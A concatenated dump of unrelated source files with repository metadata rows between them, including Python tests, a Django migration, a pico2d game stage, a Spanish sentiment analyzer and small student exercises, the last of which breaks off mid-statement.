    with mock.patch(module('os.path.isfile')) as isfile_patch:
      isfile_patch.side_effect = isfile
      options = self.ParseArgs([])
    self.assertEqual(options.trace_processor_path,
                     '/path/to/chromium/out/Release/trace_processor_shell')

  def testTraceProcessorPath_twoBuildDirs(self):
    # Ambiguous: two candidate builds, so no path is auto-selected.
    def isfile(path):
      return path in ['/path/to/chromium/out/Release/trace_processor_shell',
                      '/path/to/chromium/out/Debug/trace_processor_shell']
    with mock.patch(module('os.path.isfile')) as isfile_patch:
      isfile_patch.side_effect = isfile
      options = self.ParseArgs([])
    self.assertIsNone(options.trace_processor_path)
class StandaloneTestProcessOptions(ProcessOptionsTestCase):
  """ProcessOptions behavior in standalone mode, where the output format
  and intermediate directory become required arguments."""

  def setUp(self):
    super(StandaloneTestProcessOptions, self).setUp()
    self.standalone = True

  def testOutputFormatRequired(self):
    with self.assertRaises(SystemExit):
      self.ParseArgs([])

  def testIntermediateDirRequired(self):
    with self.assertRaises(SystemExit):
      self.ParseArgs(['--output-format', 'json-test-results'])

  def testSuccessful(self):
    options = self.ParseArgs(
        ['--output-format', 'json-test-results',
         '--intermediate-dir', 'some_dir'])
    self.assertEqual(options.output_formats, ['json-test-results'])
    # Relative intermediate dir is resolved against the (mocked) cwd.
    self.assertEqual(options.intermediate_dir, '/path/to/curdir/some_dir')
    self.assertEqual(options.output_dir, '/path/to/output_dir')
| [
"pcding@ucdavis.edu"
] | pcding@ucdavis.edu |
53bd21551303a9812df6895c3a5bcf7d5342dedb | d772869033c47a666622e9ee518bb306db5451a5 | /unified/modules/main/categories/crm/entities/deal.py | 0bcaee514289e3195334ae924481bbb68f1f6ee0 | [] | no_license | funny2code/unified_api | 920f1e19b2304e331b019f8a531d412b8759e725 | ffa28ba0e5c0bd8ad7dd44a468e3d1e777bba725 | refs/heads/main | 2023-08-31T16:00:17.074427 | 2021-10-04T04:09:45 | 2021-10-04T04:09:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 342 | py | from dataclasses import dataclass
@dataclass
class Deal:
    """CRM deal record used by the unified API layer.

    NOTE(review): every field is annotated ``str`` but defaults to None,
    so the effective type is Optional[str]; all fields are optional.
    """
    deal_id: str = None        # provider-side deal identifier
    account_id: str = None     # owning account
    name: str = None
    close_date: str = None
    description: str = None
    stage_id: str = None       # pipeline stage reference
    value: str = None          # deal amount
    probability: str = None
    owner_id: str = None
    contact_id: str = None
    currency_id: str = None
"baidawardipendar@gmail.com"
] | baidawardipendar@gmail.com |
832cce96b7f9dfa6dbddcb796fe9a8b2301cf122 | 2065098a18b5ecc3e08b6f1634a59c54b2a6dcd6 | /item/migrations/0011_item_tag.py | f83793352c43d578b67bea0a8429f66853a9c5bb | [] | no_license | JongtaeKim93/point_mall | 03a83b0f913b3db56fa9048b0a3b7ed3085830b5 | abd0862297a6ed946913f0441f0fac6c41f23567 | refs/heads/master | 2022-12-23T17:54:36.722102 | 2019-08-29T08:01:48 | 2019-08-29T08:01:48 | 198,540,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | # Generated by Django 2.2.3 on 2019-08-20 02:23
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2.3: adds a many-to-many ``tag`` field to
    # Item, pointing at item.Tag (reverse accessor name: 'tags').

    dependencies = [
        ('item', '0010_tag'),
    ]

    operations = [
        migrations.AddField(
            model_name='item',
            name='tag',
            field=models.ManyToManyField(related_name='tags', to='item.Tag'),
        ),
    ]
| [
"minahn93@gmail.com"
] | minahn93@gmail.com |
611e284cb8350ee5e0530de97ff2121e728b6f84 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/279/66340/submittedfiles/testes.py | 7ccd166e96f0a4767cbe69f6d5511f7efefae093 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 165 | py | # -*- coding: utf-8 -*-
# COMECE AQUI ABAIXO
nome = "andre bezerra de barrros "
idade = "24"
print(nome)
print(idade)
print(11 + 1037)
soma = 9 * 35 + 160
print(soma / 5)
raio = 10 / 2
# Volume-style formula: pi * r * r * height, printed exactly as before.
print(3.14159 * raio * raio * 30)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
50231bfaaa346862a809d5b0b867c22d6adfb0e0 | 450525bb5cb613c3b1b331ad6a48259c53d93f4b | /array/flip.py | 0b17f47423cc6a8132ac8d7be6da579c952eef69 | [] | no_license | peterdjlee/ds_algorithms | 61dcf4e3af2db8332841462f901cab9a6df4d0cb | 87827ad4c51c3ddf5822877a2f4803f99db5d0cc | refs/heads/master | 2020-05-25T16:52:17.685132 | 2019-11-10T05:04:20 | 2019-11-10T05:04:20 | 187,895,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,085 | py | # "Flipping an Image" from Leetcode
# Given a binary matrix A, we want to flip the image horizontally,
# then invert it, and return the resulting image.
# To flip an image horizontally means that each row of the image is reversed.
# For example, flipping [1, 1, 0] horizontally results in [0, 1, 1].
# To invert an image means that each 0 is replaced by 1, and each 1 is replaced by 0.
# For example, inverting [0, 1, 1] results in [1, 0, 0].
# EXAMPLE 1
# Input: [[1,1,0],[1,0,1],[0,0,0]]
# Output: [[1,0,0],[0,1,0],[1,1,1]]
# Explanation: First reverse each row: [[0,1,1],[1,0,1],[0,0,0]].
# Then, invert the image: [[1,0,0],[0,1,0],[1,1,1]]
# EXAMPLE 2
# Input: [[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]
# Output: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]]
# Explanation: First reverse each row: [[0,0,1,1],[1,0,0,1],[1,1,1,0],[0,1,0,1]].
# Then invert the image: [[1,1,0,0],[0,1,1,0],[0,0,0,1],[1,0,1,0]]
# Notes:
# 1 <= A.length = A[0].length <= 20
# 0 <= A[i][j] <= 1
def flipAndInvertImage(matrix):
    """Reverse each row of a binary matrix, then invert every bit.

    Args:
        matrix: list of rows containing only 0s and 1s.

    Returns:
        The same matrix object, mutated in place: each row horizontally
        flipped and every bit inverted (1 - bit flips 0 <-> 1).

    Improvements over the original: the manual swap/invert bookkeeping
    (including the odd-width middle-column special case) is replaced by a
    single pass per row, rows keep their identity via slice assignment,
    and an empty matrix no longer raises IndexError.
    """
    for row in matrix:
        row[:] = [1 - bit for bit in reversed(row)]
    return matrix
# Self-check cases: (input grid, expected flipped+inverted grid).
cases = [
    ([[1, 1, 0], [1, 0, 1], [0, 0, 0]],
     [[1, 0, 0], [0, 1, 0], [1, 1, 1]]),
    ([[1, 1, 0, 0], [1, 0, 0, 1], [0, 1, 1, 1], [1, 0, 1, 0]],
     [[1, 1, 0, 0], [0, 1, 1, 0], [0, 0, 0, 1], [1, 0, 1, 0]]),
]
for case_no, (grid, expected) in enumerate(cases, start=1):
    verdict = "Passed" if flipAndInvertImage(grid) == expected else "Failed"
    print("Case {} {}".format(case_no, verdict))
| [
"peterdjlee@gmail.com"
] | peterdjlee@gmail.com |
fffb6afe04ae24bc0ad2edd767d297c6d60f611e | f56de46df70081cc7f7479b5c9177cba88725c24 | /stage8_state.py | 667a78babed37880e9d5b71ff05db620a4443e2d | [] | no_license | DongGyu96/2DGP | 7418397da1166f1f4ecc05a56737e6d152e30fd2 | 7f3d0384381fcc6ad8df621538e972b5bd55d8b9 | refs/heads/master | 2021-01-24T08:15:54.878516 | 2016-12-22T13:02:14 | 2016-12-22T13:02:14 | 68,904,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,354 | py | import game_framework
import main_state
import math
import stage7_state
from pico2d import *
from Ball_Object import Ball
from Block_Object import Block
from BGM_Object import BGM
name = "Stage8_State"

# --- Module-level stage state (pico2d images and game objects), all
# --- (re)initialized in enter().
image = None                 # background image
text_image = None            # stage title image
circle = None                # central circle the balls orbit
blueball = None
redball = None
blueball_effect = None       # trail sprite for the blue ball
redball_effect = None        # trail sprite for the red ball
pausebutton_image = None
move = False                 # True while a movement key (A/D) is held; see handle_events
reverse = True               # direction flag: D sets True, A sets False (see handle_events)
RedBall = None
BlueBall = None
blocks = None                # list of obstacle Block objects
running = None               # False when paused or a ball has died
pausemenu_image = None
redball_dead = None
blueball_dead = None
count = None                 # frame counter pacing the death animation
dead_animation_frame = None  # current death-animation frame (0..9)
blueball_dead_image = None
redball_dead_image = None
bgm = None                   # background music for this stage
def enter():
    """Load stage assets, spawn the balls/blocks, and reset run state."""
    global image
    global text_image
    global pausebutton_image
    global circle
    global blueball, blueball_effect, blueball_dead_image
    global redball, redball_effect, redball_dead_image
    global running
    global RedBall, BlueBall, blocks
    global pausemenu_image
    global blueball_dead, redball_dead, dead_animation_frame, count
    global bgm
    pausemenu_image = load_image('Resource/pause_image.png')
    circle = load_image('Resource/circle.png')
    blueball = load_image('Resource/blueball.png')
    redball = load_image('Resource/redball.png')
    blueball_effect = load_image('Resource/blueball_effect.png')
    redball_effect = load_image('Resource/redball_effect.png')
    text_image = load_image('Resource/stage8.png')
    pausebutton_image = load_image('Resource/pausebutton.png')
    image = load_image('Resource/stage_background.png')
    blueball_dead_image = load_image('Resource/blueball_dead_animation.png')
    redball_dead_image = load_image('Resource/redball_dead_animation.png')
    # The two balls start on opposite sides (angles 0 and 180).
    RedBall = Ball(390, 150, 0)
    BlueBall = Ball(110, 150, 180)
    blocks = [Block(0, 1400, 4), Block(250, 2250, 4), Block(500, 1400, 4), Block(250, 1200, 2), Block(180, 1500, 2), Block(400, 3050, 4), Block(50, 2900, 3), Block(50, 3100, 3), Block(50, 3300, 3), Block(100, 3600, 1), Block(100, 3850, 1), Block(100, 4100, 1), Block(400, 4350, 1)]
    running = True
    count = 0
    dead_animation_frame = 0
    redball_dead = False
    blueball_dead = False
    bgm = BGM(8)
    pass
def exit():
    """Free stage objects when leaving this state (shadows builtin exit)."""
    global blocks
    global RedBall, BlueBall
    global bgm
    del(bgm)
    del(RedBall)
    del(BlueBall)
    # NOTE(review): del(block) only unbinds the loop variable each
    # iteration; the Block objects stay referenced by the blocks list.
    for block in blocks:
        del(block)
    pass
def update(frame_time):
    """Advance one frame: move blocks/balls, detect deaths, drive animations."""
    global blueball_dead, redball_dead, dead_animation_frame, count, running
    if running == True:
        for block in blocks:
            block.update(frame_time)
        # Apply held-key movement; reverse selects the direction flag
        # passed to Ball.move (True = D key, False = A key).
        if move == True:
            if reverse == True:
                BlueBall.move(True, frame_time)
                RedBall.move(True, frame_time)
            elif reverse == False:
                BlueBall.move(False, frame_time)
                RedBall.move(False, frame_time)
        BlueBall.update(frame_time)
        RedBall.update(frame_time)
        # Ball-vs-block overlap: a hit stops the game and starts the
        # corresponding death animation.
        for block in blocks:
            if block.left < BlueBall.x < block.right and block.bottom < BlueBall.y < block.top:
                running = False
                blueball_dead = True
            elif block.left < RedBall.x < block.right and block.bottom < RedBall.y < block.top:
                running = False
                redball_dead = True
        # Stage cleared once the last block has scrolled far off-screen.
        if blocks[len(blocks) - 1].y < -300:
            game_framework.change_state(main_state)
    if running == False:
        # Advance the death animation one frame every 6 updates; after
        # frame 10, restart the stage via enter().
        count += 1
        if count == 6:
            if blueball_dead == True or redball_dead == True:
                dead_animation_frame += 1
                count = 0
        if dead_animation_frame == 10:
            enter()
def draw(frame_time):
    """Render background, trails, blocks, UI, balls, and overlays."""
    clear_canvas()
    image.draw(250,400)
    # Motion trails: the last 10 recorded positions of each living ball.
    for n in range(0 , 10):
        if blueball_dead == False:
            blueball_effect.draw(BlueBall.trace_x[n], BlueBall.trace_y[n])
        if redball_dead == False:
            redball_effect.draw(RedBall.trace_x[n], RedBall.trace_y[n])
    for block in blocks:
        block.Draw()
    text_image.draw(50,780)
    pausebutton_image.draw(470,770)
    circle.draw(250,150)
    if blueball_dead == False:
        blueball.draw(BlueBall.x, BlueBall.y)
    if redball_dead == False:
        redball.draw(RedBall.x, RedBall.y)
    if running == False:
        # Stopped: either play the 106x106 per-frame death animation at the
        # dead ball's position, or show the pause menu.
        if blueball_dead == True:
            blueball_dead_image.clip_draw(dead_animation_frame * 106, 0, 106, 106, BlueBall.x, BlueBall.y)
        elif redball_dead == True:
            redball_dead_image.clip_draw(dead_animation_frame * 106, 0, 106, 106, RedBall.x, RedBall.y)
        else:
            pausemenu_image.draw(250, 400)
    update_canvas()
    pass
def handle_events(frame_time):
    """Process SDL input: pause button/menu clicks and A/D movement keys."""
    events = get_events()
    global running
    global move,reverse
    for event in events:
        if event.type == SDL_QUIT:
            game_framework.quit()
        elif event.type == SDL_MOUSEBUTTONDOWN and event.button == SDL_BUTTON_LEFT:
            # Mouse y is flipped against the 800-pixel-high canvas before
            # hit-testing the on-screen regions.
            # Pause button (top right): toggles pause/resume.
            if 450 < event.x < 490 and 750 < 800 - event.y < 790:
                if running == False:
                    resume()
                else:
                    pause()
            # Pause-menu "back to main" region (only active while paused).
            if 180 < event.x < 320 and 375 < 800 - event.y < 425:
                if running == False:
                    game_framework.change_state(main_state)
            # Pause-menu "resume" region (only active while paused).
            if 210 < event.x < 290 and 320 < 800 - event.y < 360:
                if running == False:
                    resume()
        else:
            if event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:
                game_framework.quit()
            elif event.type == SDL_KEYDOWN and event.key == SDLK_BACKSPACE:
                game_framework.change_state(stage7_state)
            # A/D press starts movement and sets the direction flag; the
            # matching key release stops movement only if that direction
            # is still the active one.
            elif event.type == SDL_KEYDOWN and event.key == SDLK_a:
                move = True
                reverse = False
            elif event.type == SDL_KEYDOWN and event.key == SDLK_d:
                move = True
                reverse = True
            elif event.type == SDL_KEYDOWN and event.key == SDLK_m:
                game_framework.change_state(main_state)
            elif event.type == SDL_KEYUP and event.key == SDLK_a:
                if reverse == False:
                    move = False
            elif event.type == SDL_KEYUP and event.key == SDLK_d:
                if reverse == True:
                    move = False
    pass
def pause():
    """Halt gameplay by clearing the module-level ``running`` flag."""
    global running
    running = False
def resume():
    """Continue gameplay by setting the module-level ``running`` flag."""
    global running
    running = True
"crow4079@naver.com"
] | crow4079@naver.com |
bebb7bc514d382106d8ed6f452d956b5a09201d4 | 72e68181ea99ed967a565975ae5d9119e486ea91 | /employee.py | 111655c82ee5cee19bea3686a0564e166337bc39 | [] | no_license | lmac02/HW4-ill | 71fcc48d7e1352a0a3d375c6eb90aaf4a858eba0 | 61983eb5985dd8aeab51fb903dbe749247e8e190 | refs/heads/master | 2020-04-11T01:13:44.921464 | 2018-03-12T22:12:32 | 2018-03-12T22:12:32 | 124,317,015 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | from person import person
from person import make_routingNumber
from person import make_ssn
import random as r
from datetime import datetime as dt
class employee(person):
    """A bank employee: a `person` with employee permissions who can view
    customer details but, unlike a manager, cannot delete customers."""
    def __init__(self):
        # Reuse person's setup, then flag this account as an employee.
        person.__init__(self)
        self.employee_permissions = True
    def ShowCustomerInfo(self, other):
        """Print *other*'s record; account number is zero-padded to 12 digits."""
        print( 'Customer: {}\nD.O.B: {}/{}/{}\nAddress: {}\nAccount Number: {}\nRoutingNumber: {}\nBalance: {}'.format(other.name, other.birthdate.month, other.birthdate.day, other.birthdate.year, other.address, str(other.account_number).zfill(12), other.routing_number, other.balance))
    def DeleteCustomer(self, other):
        """Employees lack deletion rights; print a denial message instead."""
        print('\nAction denied. Must be a manager to perform this action.')
    def SeeCustomers(self):
        """Print how many customers exist (class-level person.customer_list)."""
        print('\nNumber of customers: {}'.format(len(person.customer_list)))
| [
"noreply@github.com"
] | lmac02.noreply@github.com |
cdf3d09aaf600bff0fb8404dcd1901d6d23bd172 | c6b3abd156c09326c3a6e5da9e420eed6a5ffd8e | /Test/parameter_text.py | a4b8ac7fb51c882f8ec266a775559df5b60f0bb8 | [] | no_license | andoniVT/ESA_Final | 4c36230fd3b5e1232869ce366cb0fc15c68ed7ec | 065669df965589d00f84c2be873ada935bb0e3a9 | refs/heads/master | 2021-01-10T13:46:30.146613 | 2015-10-29T18:54:10 | 2015-10-29T18:54:10 | 43,454,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,397 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on 15/11/2014
@author: andoni
'''
import re
import Test.settings as settings
import Test.corpus as corpus
from Test.term import Term
from Test.manager_rule import Manager , Pattern
import Test.commentPreprocessor as CP
class ParameterText(object):
    """Lexicon-based sentiment analyzer for Spanish text (incl. Peruvian slang).

    evaluate() preprocesses a comment, extracts multi-word combinations,
    tokenizes, tags every term against the loaded corpora (emoticons,
    punctuation, boosters, negations, words/slangs), runs the rule engine
    (Manager) and buckets the resulting patterns by sign and contribution
    type; the get_* accessors expose those buckets.
    """
    def __init__(self):
        '''
        Constructor
        '''
        # Raw input and aggregate counters (recomputed by the accessors).
        self.__comment = ""
        self.__contribution_positive = 0
        self.__contribution_negative = 0
        self.__number_elements_positive = 0
        self.__number_elements_negative = 0
        # Working lists filled during evaluate().
        self.__crude_term_list = list()
        self.__term_list = list()
        self.__pattern_list = list()
        self.__contribution_words_pos = list()
        self.__contribution_words_neg = list()
        self.__contribution_emoticons_pos = list()
        self.__contribution_emoticons_neg = list()
        self.__contribution_combinations_pos = list()
        self.__contribution_combinations_neg = list()
        # Lexicons loaded once per instance from the corpus files.
        self.__emoticons = corpus.emoticons_list(settings.EMOTICONS)
        self.__booster_words = corpus.booster_words_list(settings.BOOSTER_WORDS_SPANISH)
        self.__negating_words = corpus.negating_words_list(settings.NEGATING_WORDS_SPANISH)
        self.__punctuation = corpus.punctuation_list(settings.PUNCTUATION)
        self.__stopwords_list = corpus.stopwords_list(settings.STOPWORDS_SPANISH_OPINION_MINING)
        self.__words_and_slangs = corpus.words_and_slangs_list(settings.SENTIMENT_WORDS_SPANISH, settings.SLANGS_PERUVIAN)
        self.__combinations = corpus.combinations_list(settings.COMBINATIONS_SPANISH, settings.COMBINATIONS_SLANGS_PERUVIAN)
    def evaluate(self, comment):
        """Run the full pipeline on *comment* and populate the buckets."""
        proccess = CP.Comment_proccesor(comment , False)
        comment = proccess.get_processed_comment()
        self.__comment = comment
        comment = self.__search_combinations(comment)
        self.__init_term_list(comment)
        for term in self.__crude_term_list:
            self.__tagging(term)
        self.__apply_rules()
        self.__analize_contributions()
    def __tagging(self, term):
        """Classify one token and append the resulting Term to __term_list.

        Lookup order: emoticon, punctuation, booster, negation, word/slang;
        anything unmatched is tagged neutral. Each match returns early.
        """
        obj_term = Term(term)
        new_term = obj_term.get_new_term()
        # type = emoticon
        result = self.__search(self.__emoticons, term)
        if result != settings.TERM_NOT_FOUND:
            obj_term.set_term_type(settings.TERM_TYPE_EMOTICON)
            obj_term.set_original_weight(int(self.__emoticons[result]))
            self.__term_list.append(obj_term)
            return
        # type = punctuation
        result = self.__search(self.__punctuation, new_term)
        if result != settings.TERM_NOT_FOUND:
            obj_term.set_term_type(settings.TERM_TYPE_PUNCTUATION)
            obj_term.set_original_weight(int(self.__punctuation[result]))
            self.__term_list.append(obj_term)
            return
        # type = booster word
        result = self.__search(self.__booster_words, new_term)
        if result != settings.TERM_NOT_FOUND:
            obj_term.set_term_type(settings.TERM_TYPE_BOOSTER)
            obj_term.set_original_weight(int(self.__booster_words[result]))
            self.__term_list.append(obj_term)
            return
        # type = negation (no weight; only flips/affects rules)
        if new_term in self.__negating_words:
            obj_term.set_term_type(settings.TERM_TYPE_NEGATING)
            self.__term_list.append(obj_term)
            return
        # type = word or slang
        #new_term = self.__corrector.correct(new_term)
        #obj_term.set_new_term(new_term)
        #new_dictionary = dict(self.__words_and_slangs.items() + self.__new_simple_vocabulary.items() + self.__modified_words.items())
        result = self.__search(self.__words_and_slangs, new_term)
        #result = self.__search(new_dictionary, new_term)
        if result != settings.TERM_NOT_FOUND:
            obj_term.set_term_type(settings.TERM_TYPE_WORD_SLANG)
            obj_term.set_original_weight(int(self.__words_and_slangs[result]))
            #obj_term.set_original_weight(int(new_dictionary[result]))
            self.__term_list.append(obj_term)
            return
        # type = neutral (no lexicon matched)
        obj_term.set_term_type(settings.TERM_TYPE_NEUTRO)
        self.__term_list.append(obj_term)
    def __apply_rules(self):
        """Feed the tagged terms to the rule engine and keep its patterns."""
        manager = Manager(self.__term_list)
        manager.apply_rules()
        self.__pattern_list = manager.get_patterns_list()
    def __analize_contributions(self):
        """Bucket each pattern by contribution type (word / emoticon /
        anything else = combination) and by sign (weight >= 0 is positive)."""
        for pattern in self.__pattern_list:
            if pattern.get_contribution_type() == Pattern.CONTRIBUTION_WORD:
                if pattern.get_total_weight() >= 0: self.__contribution_words_pos.append(pattern)
                else: self.__contribution_words_neg.append(pattern)
            elif pattern.get_contribution_type() == Pattern.CONTRIBUTION_EMOTICON:
                if pattern.get_total_weight() >= 0: self.__contribution_emoticons_pos.append(pattern)
                else: self.__contribution_emoticons_neg.append(pattern)
            else:
                if pattern.get_total_weight() >= 0: self.__contribution_combinations_pos.append(pattern)
                else: self.__contribution_combinations_neg.append(pattern)
    # --- Per-bucket weight totals (sum of pattern total weights) ---
    def get_contribution_words_pos(self):
        total = 0
        for pattern in self.__contribution_words_pos:
            total += pattern.get_total_weight()
        return total
    def get_contribution_words_neg(self):
        total = 0
        for pattern in self.__contribution_words_neg:
            total += pattern.get_total_weight()
        return total
    def get_contribution_emoticons_pos(self):
        total = 0
        for pattern in self.__contribution_emoticons_pos:
            total += pattern.get_total_weight()
        return total
    def get_contribution_emoticons_neg(self):
        total = 0
        for pattern in self.__contribution_emoticons_neg:
            total += pattern.get_total_weight()
        return total
    def get_contribution_combinations_pos(self):
        total = 0
        for pattern in self.__contribution_combinations_pos:
            total += pattern.get_total_weight()
        return total
    def get_contribution_combinations_neg(self):
        total = 0
        for pattern in self.__contribution_combinations_neg:
            total += pattern.get_total_weight()
        return total
    def get_contribution_positive(self):
        """Total positive weight across all three bucket types."""
        self.__contribution_positive = self.get_contribution_words_pos() + self.get_contribution_emoticons_pos() + self.get_contribution_combinations_pos()
        return self.__contribution_positive
    def get_contribution_negative(self):
        """Total negative weight across all three bucket types."""
        self.__contribution_negative = self.get_contribution_words_neg() + self.get_contribution_emoticons_neg() + self.get_contribution_combinations_neg()
        return self.__contribution_negative
    # --- Per-bucket element counts ---
    def get_number_words_pos(self):
        return len(self.__contribution_words_pos)
    def get_number_words_neg(self):
        return len(self.__contribution_words_neg)
    def get_number_emoticons_pos(self):
        return len(self.__contribution_emoticons_pos)
    def get_number_emoticons_neg(self):
        return len(self.__contribution_emoticons_neg)
    def get_number_combinations_pos(self):
        return len(self.__contribution_combinations_pos)
    def get_number_combinations_neg(self):
        return len(self.__contribution_combinations_neg)
    def get_number_elements_positive(self):
        self.__number_elements_positive = self.get_number_words_pos() + self.get_number_emoticons_pos() + self.get_number_combinations_pos()
        return self.__number_elements_positive
    def get_number_elements_negative(self):
        self.__number_elements_negative = self.get_number_words_neg() + self.get_number_emoticons_neg() + self.get_number_combinations_neg()
        return self.__number_elements_negative
    def __init_term_list(self, comment):
        """Tokenize *comment* into __crude_term_list: keep emoticons whole,
        strip punctuation from other tokens, drop stopwords, and split a
        token at an embedded '!' or '?' so the mark becomes its own term."""
        tmp_list = re.split("\s+",comment) # Split the text on any whitespace character
        for term in tmp_list:
            if not term in self.__stopwords_list:
                if term in self.__emoticons:
                    self.__crude_term_list.append(term)
                else:
                    process = CP.Comment_proccesor()
                    term = process.remove_punctuation_marks(term)
                    if len(term) > 0:
                        index = term.find("!")
                        if index == -1: index = term.find("?")
                        if index > 0:
                            self.__crude_term_list.append(term[:index])
                            self.__crude_term_list.append(term[index:])
                        else:
                            self.__crude_term_list.append(term)
    def __search (self, tmp_list, term):
        """Find *term* in a lexicon: entries carrying the FLEXIS marker are
        matched as stems (term must start with the stem and be longer),
        everything else needs an exact match. Returns the matched lexicon
        entry or settings.TERM_NOT_FOUND."""
        for word in tmp_list:
            if word.count(settings.FLEXIS_SIMBOL) > 0: # Entry carries the inflection (flexis) marker
                root_word = word.replace(settings.FLEXIS_SIMBOL, "")
                if term.startswith(root_word, 0) and len(term) > len(root_word):
                    return word
            else:
                if term == word:
                    return word
        return settings.TERM_NOT_FOUND
    def __search_combinations(self, comment):
        """Tag every known multi-word combination found in *comment* and
        remove it (case-insensitively) from the text; returns the stripped
        comment for the per-token pass."""
        comment_lower = comment.lower()
        #new_dictionary = dict(self.__combinations.items() + self.__new_combination_vocabulary.items() + self.__modified_combinations.items())
        #for combination in new_dictionary:
        for combination in self.__combinations:
            if comment_lower.find(combination) >= 0:
                obj_term = Term(combination)
                obj_term.set_term_type(settings.TERM_TYPE_COMBINATION)
                obj_term.set_original_weight(int(self.__combinations[combination]))
                self.__term_list.append(obj_term)
                comment = re.sub(combination, "", comment, flags=re.IGNORECASE)
        return comment
    def print_terms(self):
        """Debug helper: dump every detected pattern (type, text, weight)."""
        for pattern in self.__pattern_list:
            print(pattern.get_contribution_type(), pattern.description(), pattern.get_total_weight())
    def clean_data(self):
        ''' Re-initialize all working lists (loaded lexicons are kept). '''
        self.__crude_term_list = list()
        self.__term_list = list()
        self.__pattern_list = list()
        self.__contribution_words_pos = list()
        self.__contribution_words_neg = list()
        self.__contribution_emoticons_pos = list()
        self.__contribution_emoticons_neg = list()
        self.__contribution_combinations_pos = list()
        self.__contribution_combinations_neg = list()
if __name__ == '__main__':
    # Ad-hoc smoke test: evaluate one sample Spanish comment and dump the
    # detected patterns, with start/finish timestamps.
    import time
    print("Starting... ",time.strftime("%H:%M:%S %d %b"))
    obj = ParameterText()
    comment = "poco bueno muy bueno poco malo muy malo"
    #comment = "muy bueno!!! muy mal!!! poco bueno!!! poco mal!!!"
    #comment = "no muy bueno no muy malo"
    #comment = "@ClaroPeru Hola, actualmente tengo un Nextel pero quiero migrar a Claro manteniendo el mismo número. Cuál es el procedimiento?"
    obj.evaluate(comment)
    obj.print_terms()
    print("Finished... ",time.strftime("%H:%M:%S %d %b"))
| [
"andoni.valverde@ucsp.edu.pe"
] | andoni.valverde@ucsp.edu.pe |
5b443bc248f4ba4e33ec6a112ee23731ed68ef18 | c0eaa927a308c95f66c3d3be881d69f21eca024c | /Main/urls.py | b6ded82991322f4145371ee802796e85ae80d996 | [] | no_license | gitRobV/Main | 45d96de24e6a55cefe1fdf676bcce9a4cd9a490b | d75ec66176f0eeb5717be4d3ead723434a2971d0 | refs/heads/master | 2020-12-03T09:16:27.405098 | 2017-06-28T01:28:27 | 2017-06-28T01:28:27 | 95,613,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | """Main URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
urlpatterns = [
url(r'^', include('apps.main.urls')),
]
| [
"robertv1979@gmail.com"
] | robertv1979@gmail.com |
643abe60ca6014563cdd023652e73a2d29a6797e | cc22c017e3b7a127218755f7183c377235eb76dd | /persona.py | 6844c9aa40e6c868a6d8ba7b0a6efdc7332d0d23 | [] | no_license | iandrade90/python-crud-pool-conn | 17efb74115e77cbb9211211fd0895dd2a5b6d9d6 | 139f40b51c2d159823ca4be9e4fcc619b275fe32 | refs/heads/main | 2023-04-15T12:47:33.718000 | 2021-04-27T01:49:54 | 2021-04-27T01:49:54 | 361,946,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 997 | py | class Persona():
    def __init__(self, id_persona=None, nombre=None, apellido=None, email=None):
        """Store the person's id, first name (nombre), last name (apellido)
        and email in name-mangled fields exposed via get_/set_ accessors."""
        self.__id_persona = id_persona
        self.__nombre = nombre
        self.__apellido = apellido
        self.__email = email
def __str__(self):
return (
f'ID persona: {self.__id_persona}, '
f'Nombre: {self.__nombre}, '
f'Apellido: {self.__apellido}, '
f'Email: {self.__email}'
)
    # Plain accessors for the name-mangled fields (Java-style get/set API
    # kept for compatibility with existing callers).
    def set_nombre(self, nombre):
        self.__nombre = nombre
    def set_apellido(self, apellido):
        self.__apellido = apellido
    def set_email(self, email):
        self.__email = email
    def set_personaid(self, id_persona):
        self.__id_persona = id_persona
    def get_personaid(self):
        return self.__id_persona
    def get_nombre(self):
        return self.__nombre
    def get_apellido(self):
        return self.__apellido
    def get_email(self):
        return self.__email
| [
"ivandandrade90@gmail.com"
] | ivandandrade90@gmail.com |
1c460f138444384b52eda73ccc1a7db8da23d76b | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/225/users/3999/codes/1635_2442.py | 7d4cb10f6eb2bb08c1ebeeb9ad94276bb7866760 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | # Teste seu código aos poucos.
# Não teste tudo no final, pois fica mais difícil de identificar erros.
# Use as mensagens de erro para corrigir seu código.
num=int(input("Digite um numero: "))
if (num%2==0):
mensagem="par"
else:
